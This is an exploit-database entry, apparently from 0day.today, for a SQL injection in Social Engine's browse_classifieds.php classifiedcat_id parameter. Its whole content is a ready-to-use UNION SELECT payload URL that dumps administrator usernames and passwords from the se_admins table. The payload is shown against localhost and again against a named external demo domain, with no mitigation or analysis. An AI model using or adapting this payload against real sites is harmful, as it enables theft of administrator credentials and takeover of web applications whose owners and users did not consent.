id: 4638
date: 01/11/2009
title: Social Engine (browse_classifieds.php s) SQL Injection Vulnerability
author: Snakespc
cves: 

=====================================================================
Social Engine (browse_classifieds.php s) SQL Injection Vulnerability
====================================================================


                  ===================================GAZA=============================================

Exploit:
http://localhost/browse_classifieds.php?s=classified_date%20DESC&v=0&classifiedcat_id=-1+UNION%20SELECT%20concat(admin_username,0x3a,admin_password),2,3+from+se_admins
********
demo:
http://www.socialenginedev.com/browse_classifieds.php?s=classified_date%20DESC&v=0&classifiedcat_id=-1+UNION%20SELECT%20concat(admin_username,0x3a,admin_password),2,3+from+se_admins
==================================================================================================================



#  0day.today [2023-03-22]  #